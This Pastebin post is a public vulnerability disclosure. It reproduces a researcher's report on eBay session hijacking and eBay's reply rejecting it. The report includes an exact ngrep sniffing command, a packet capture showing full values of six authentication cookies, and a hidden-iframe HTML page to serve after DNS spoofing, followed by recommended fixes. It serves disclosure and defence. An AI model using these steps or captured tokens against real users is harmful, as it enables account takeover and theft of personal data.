API tools faq
paste
Advertisement
Guest User

EBay Security Vulnerability

a guest
Jan 31st, 2015
1,755
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.28 KB | None | 0 0
raw download clone embed print report
  1. What follows is the communication between the EBay security team and myself. I've identified the vulnerability, YET... They refuse to fix it -- To be honest, I don't believe they took the time to actually read it based on their response -- If they did, then they should fire whoever reviewed my concern, they obviously have NO clue about what it is they do.
  2.  
  3. My only recourse is to go public in hopes the community can pressure them to fix it.
  4.  
  5. Final Response from EBay:
  6. Thank You for your submission. In our evaluation of any issue, we assess it within the context of our entire security infrastructure. In this case, we found the issue to be invalid as report says "eBay is not transported over HTTPS" in a very lengthy manner therefore it is an accepted business risk.
  7.  
  8. Regards,
  9. eBay Security Research
  10.  
  11.  
  12. Original Whitepaper:
  13. Issue: For ebay.com, there are multiple session hijacking vulnerabilities.
  14.  
  15. 1- The domain uses HTTPS for login, but after authentication, reverts to HTTP. Any cookies that do not have the Secure Flag will be sent in plaintext every time a user clicks on a link within the page.
  16. - This is commonly referred to as Leakage
  17. - Leakage happens whenever an authentication token is sent in plaintext
  18.  
  19. 2- After a battery of tests, it has been determined that there are 6 cookies that form the "token" for a user to login to ebay.com. This will allow for vector #1 listed above, to allow an attacker the ability to sniff those cookies. The following cookies are the ones in question:
  20. - shs
  21. - ns1
  22. - cid
  23. - npii
  24. - nonsession
  25. - dp1
  26.  
  27. 3- By default, ebay.com sets the user up to "Remember Me". This in and of itself is an innocent browser setting. Combined with the vectors listed above and below, it sets the user up to have their credentials hijacked. A "Remember Me" setting should ALWAYS be an opt-in feature versus an opt-out one. Users are lazy, they will ALWAYS take the path of least resistance, even if it is something as trivial as a mouse-click.
  28.  
  29. 4- The authentication cookies listed in vector #2 do not have the HttpOnly Flag turned on.
  30. - This allows for the victim to be attacked via XSS if such a vector were to be found on ebay.com
  31.  
  32. 5- Example of a passive attack:
  33. - This example relies around the concept of a malicious attacker within range of a place that offers free wifi
  34. - Starbucks, Barnes & Noble, McDonalds, etc...
  35. - If a user were to view ANY website that had ANY link to ebay.com within the source code of ANY website they visit, the following information could be sniffed without the attacker even being connected to the network. Again, this is a passive attack, the attacker does NOT need to be connected, nor needs to interfere with ANY of the webtraffic to gather the credentials of the would-be victim
  36. - Results of "ngrep -d <network interface card in monitor mode> npii (This is one of the six authentication cookies listed in vector #2)
  37. - Exact command: ngrep -d mon0 npii
  38. - Results:
  39. GET / HTTP/1.1..Host: ebay.com..User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux
  40. x86_64; rv:34.0) Gecko/20100101 Firefox/34.0..Accept: text/html,applicatio
  41. n/xhtml+xml,application/xml;q=0.9,*/*;q=0.8..Accept-Language: en-US,en;q=0.
  42. 5..Accept-Encoding: gzip, deflate..Cookie: shs=BAQAAAUqD5IGVAAaAAVUADlSndlM
  43. 1OTA4MTE5MzcwMDksMx3vruplDA+uSNW3x+kXxNMEd2gM; ns1=BAQAAAUqD5IGVAAaAAKUADVZ
  44. /b5ExMTY4MzMxOTY4LzA7JrmK6YdMLZErFhepglJWGXiNc8c*; cid=FwOFmznfBVNOx7FP%231
  45. 923375115; npii=btguid/88c9063b14a0a5e68b22e905ffeb94ff567f6f55^cguid/88c90
  46. 8f014a0a629b802f9b2fb35855f567f6f55^; nonsession=BAQAAAUqD5IGVAAaAAEAACVZ/b
  47. 5FzbmFmdTc3NzcBZAACVn9vkSNhAAQACVZ/b1NzbmFmdTc3NzcAqgABVn9vkTEAygAgXgQ9kTg4
  48. YzkwNjNiMTRhMGE1ZTY4YjIyZTkwNWZmZWI5NGZmAMsAAVSeQxk1ABAACVZ/b5FzbmFmdTc3Nzc
  49. AMwAOVn9vkTI5NDE0LTY2MTEsVVNBAPMAIlZ/b5EkMiRSdlNLelhvcyRYYjFxZzdnUkdtRUNHQ2
  50. VCTTcxR1ouALQAAVSeWPAwAJoAClSg3tNzbmFmdTc3NzdwAJwAOFZ/b5FuWStzSFoyUHJCbWRqN
  51. ndWblkrc0VaMlByQTJkajZBRmxvcWlDNUdMcHdTZGo2eDluWStzZVE9PQCdAAhWf2+RMDAwMDAw
  52. MDFqQVV2m+YL3eJgNgqiCEMj/bzbLw**; dp1=bexpt/0001419634098047558e7f72^pcid/1
  53. 923375115567f6f91^a1p/0549f8d91^bl/US5860a311^cq/1567f6f91^pbf/%23508180820
  54. 00004567f6f91^kms/in5860a311^mpc/0%7C054ab6b11^tzo/12c549e4a21^exc/0%3A0%3A
  55. 2%3A254c5c911^u1p/c25hZnU3Nzc3567f6f91^u1f/john567f6f91^..DNT: 1..Connectio
  56. n: keep-alive....
  57. - Notice how in the above packet capture the aforementioned cookies from vector #2 were listed: shs, ns1, cid, npii, nonsession, dp1
  58. - Tokens Captured = GAME OVER
  59.  
  60. 6- Example of an active attack:
  61. - An attacker could grab the authentication cookies by simply redirecting a user via a DNS spoof to a website under the attacker's control, where the following code was in play:
  62. <html>
  63. <head><title>404 Not Found</title></head>
  64. <body bgcolor="white">
  65. <center><h1>404 Not Found</h1></center>
  66. <hr><center>nginx/1.4.6 (CentOS)</center>
  67. <div style="position:absolute;top:-9999px;left:-9999px;visibility:collapse;">
  68. <iframe src="http://www.ebay.com"></iframe>
  69. </div></body>
  70. </html>
  71. - The above code would be seamless to the victim, they wouldn't know what hit them as it loads very fast.
  72. - The results are the same as listed within vector #5
  73.  
  74.  
  75. Severity: It would be trivial to login without permission to another user's ebay.com account. The following information and actions are able to be gathered by usage of this attack:
  76. - Name
  77. - Addresses
  78. - Registration
  79. - Shipping
  80. - Secret Question
  81. - The ability to interact with other ebay.com users
  82. - Perhaps destroy previous and/or future relationships
  83. - The ability to interfere with a user's shopping cart
  84.  
  85.  
  86. Solution:
  87. - Set HTTPS for every page.
  88. - Not using HTTPS for ALL connections, results in an attacker being able to sniff the plaintext content of an HTTP session.
  89. - HTTP is stateless by design, cookies were implemented to provide a stateful mechanism. Stateful solutions to the insecurities of HTTP must always be used within the context of HTTPS, otherwise they are vulnerable to the aforementioned techniques.
  90. - Turn on the Secure Flag for the 6 cookies listed, -and- any other cookies which give a user access to a user's ebay.com account.
  91. - Turn on the HttpOnly Flag for the 6 cookies listed -and- any other cookies which give a user access to a user's ebay.com account.
  92.  
  93.  
  94. Summary: Following the above solution will render these attack vectors null and void.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!